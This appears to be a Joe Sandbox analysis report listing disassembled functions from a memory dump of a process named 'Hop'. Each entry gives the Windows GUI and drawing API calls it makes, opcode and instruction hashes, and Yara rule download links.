                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9b3400b2d7958dcf7bb5d83233e54855c88d8e6a6dc818cc5e4bd19195bd4ddd
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6c74883583f34f04ef85d36f83607a3eef6dbda21181d136d1423d5cfc0e8fec
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b3400b2d7958dcf7bb5d83233e54855c88d8e6a6dc818cc5e4bd19195bd4ddd
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FF0C871B08A42C1DB209B25F84476EA261FFC8798F115138EB5D83BA5DF3CC484CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4741A8 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 240d552e835f2b25362e23fc86050fbc2e15662c94a0908d5121eb02f9075e07
                                                                                                                                                                                                                                                                                                          • Instruction ID: 96fc09e183cdbd0b9db4500565dd125a4f3ab4d2ded4fa5fb126a76cb80200b4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 240d552e835f2b25362e23fc86050fbc2e15662c94a0908d5121eb02f9075e07
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81B09220E1BA42C2EA086F156C8A22422A47F88710F99423DC00C81320DF2C20F59B01
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46FBB0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 487ac93962f4c08a726fa4f1cbcf22742163b5770d24f742e327d9c4be1ea4b1
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1f332067ea7f93bc79ca31993f2ec2849c58a0bff2d5c16a0d7336d7b83cffdb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 487ac93962f4c08a726fa4f1cbcf22742163b5770d24f742e327d9c4be1ea4b1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EF04471628655CAEB94DF2CA8426297790FB183C4B50813EDA89C3A44DE3C90A1DF04
                                                                                                                                                                                                                                                                                                          Function 00007FF68C455850 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8f6d893820d0fab81262624eeca4fcab017bbf27f8cb14a3bd45f903649d3583
                                                                                                                                                                                                                                                                                                          • Instruction ID: 04d9a2d467fc340a581e803c16ff88010c0c2ee367345b86adbf1a68d4df056b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f6d893820d0fab81262624eeca4fcab017bbf27f8cb14a3bd45f903649d3583
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53A00161909C0AD4E6449B11A8500302260BF60318B860839F00D820A0DE3CA4A0C304
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DF0C0 Relevance: 49.7, APIs: 33, Instructions: 231windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF128
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF133
                                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF14C
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF15E
                                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF17F
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF18E
                                                                                                                                                                                                                                                                                                          • InflateRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF1B3
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF1BE
                                                                                                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF1C6
                                                                                                                                                                                                                                                                                                          • FrameRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF1D9
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF1E2
                                                                                                                                                                                                                                                                                                          • InflateRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF237
                                                                                                                                                                                                                                                                                                          • FillRect.USER32(?,?,?,?,?,00000000), ref: 00007FF68C4DF267
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,?,?,?,?,00000000), ref: 00007FF68C4DF286
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,?,?,?,?,00000000), ref: 00007FF68C4DF2D3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF45F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF46A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF485
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF498
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4C3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: CreatePen.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4DA
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4EB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4FB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF50E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF535
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: RoundRect.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF561
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: GetWindowLongW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF56F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3521893082-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f6b3e33df0b6fd49e851f84cb0d7e1a0081305ee093791da2a064367007aa246
                                                                                                                                                                                                                                                                                                          • Instruction ID: fef69ad56ea6ca2380be814950771d27c2565eec59b4d9c0f3a931a23554ec01
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6b3e33df0b6fd49e851f84cb0d7e1a0081305ee093791da2a064367007aa246
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4A17C76F08A12C6EB24DB61E84467D2761FF48BB8F114238EE2A97B94DF3C9485C740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DF418 Relevance: 39.2, APIs: 26, Instructions: 179windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF45F
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF46A
                                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF485
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF498
                                                                                                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4A2
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4C3
                                                                                                                                                                                                                                                                                                          • CreatePen.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4DA
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4EB
                                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4FB
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF50E
                                                                                                                                                                                                                                                                                                          • InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF535
                                                                                                                                                                                                                                                                                                          • RoundRect.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF561
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF56F
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF5BC
                                                                                                                                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF5F4
                                                                                                                                                                                                                                                                                                          • InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF617
                                                                                                                                                                                                                                                                                                          • DrawFocusRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF625
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF634
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF63F
                                                                                                                                                                                                                                                                                                          • DrawTextW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF65D
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF67B
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF689
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF697
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF6A2
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF6AE
                                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF6BE
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1996641542-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8621af9f8baa88c679d1e3d4de77db066d3ff3f6df2070fff11720484c1c51e5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39719176A08A41C6E724DB61A84467A7361FF88BB8F014338EE5E87B94DF3CD484CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C432340 Relevance: 28.7, APIs: 19, Instructions: 201COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Color$LongWindow$ModeObjectStockText
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 554392163-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
                                                                                                                                                                                                                                                                                                          • Instruction ID: f090c54ff9fd296520159d0accf1f0bfdd0e0d178d2b7b2af5550e2421109590
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED810471E0C656C1FB30CB38A44867923A1FF89B68F554239D99E876E5DE3CA8C2D700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4E19D4 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162windowfileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                                                                                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                                          • API String ID: 2091158083-3440237614
                                                                                                                                                                                                                                                                                                          • Opcode ID: a6383f7ad2c15784484526503c134a2164f43bfe7e3a3a9e6e3dd31a7eae073a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 37bbac3029131a15e23169fcc286c1a4818ec0bdd7ae740385bfbda9d3cf4838
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6383f7ad2c15784484526503c134a2164f43bfe7e3a3a9e6e3dd31a7eae073a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D716272618A82D6EB10DF25E8547ED7761FF84798F804036EA4E87A99DFBCD189C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4E0898 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 175windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
